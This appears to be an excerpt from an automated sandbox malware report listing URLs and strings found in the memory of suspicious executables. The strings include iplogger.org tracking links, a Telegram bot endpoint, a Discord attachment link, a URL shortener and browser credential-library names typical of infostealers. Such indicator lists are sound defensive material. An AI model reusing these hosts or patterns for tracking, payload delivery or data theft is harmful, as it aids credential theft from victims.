Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: safert44.exe, 00000018.00000002.757934198.0000000003899000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756216750.0000000003834000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.760708459.0000000003623000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.751301963.0000000003431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.757934198.0000000003899000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 9n6ctoq7cn.exe	String found in binary or memory: http://www.company.com/
Source: 9n6ctoq7cn.exe	String found in binary or memory: http://www.company.com/83886080NewProduct000100NewProduct1NewProduct
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.company.com/h
Source: brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: namdoitntn.exe, 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, jshainx.exe.0.dr	String found in binary or memory: https://api.ip.sb/ip
Source: SETUP_~1.EXE, 00000027.00000002.737036164.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SETUP_~1.EXE, 00000027.00000002.726536828.000000000292C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: SETUP_~1.EXE, 00000027.00000002.726536828.000000000292C000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.726441946.0000000002928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.j
Source: brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SETUP_~1.EXE, 00000027.00000002.724618410.00000000028F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cutt.ly
Source: SETUP_~1.EXE, 00000027.00000002.722454892.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000000.537066191.00000000005B2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: https://cutt.ly/IXlgfrm
Source: brokerius.exe, 0000001A.00000003.588345327.00000000282AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: brokerius.exe, 0000001A.00000003.588632092.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: real.exe, 00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, brokerius.exe, 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, brokerius.exe, 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: me.exe, 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, me.exe, 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dllsdkjfh134bjk1gh2
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AA
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AAmX4
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AFh
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AFmX4
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AG
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AGmX4
Source: real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp, 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AJmX4
Source: 9n6ctoq7cn.exe, 00000000.00000002.428312299.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AJmX49
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AJx
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AK
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AKmX4
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1ARX
Source: real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp, 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1ARmX4
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1ARmX40100https://iplogger.org/1AAmX40100https://iplogger.org/1AFmX40100https:/
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AV
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AVmX4
Source: 9n6ctoq7cn.exe, 00000000.00000002.421618952.0000000000505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AVmX4C:
Source: 9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AZ
Source: 9n6ctoq7cn.exe	String found in binary or memory: https://iplogger.org/1AZmX4
Source: brokerius.exe, 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, brokerius.exe, 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://mas.to/
Source: F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
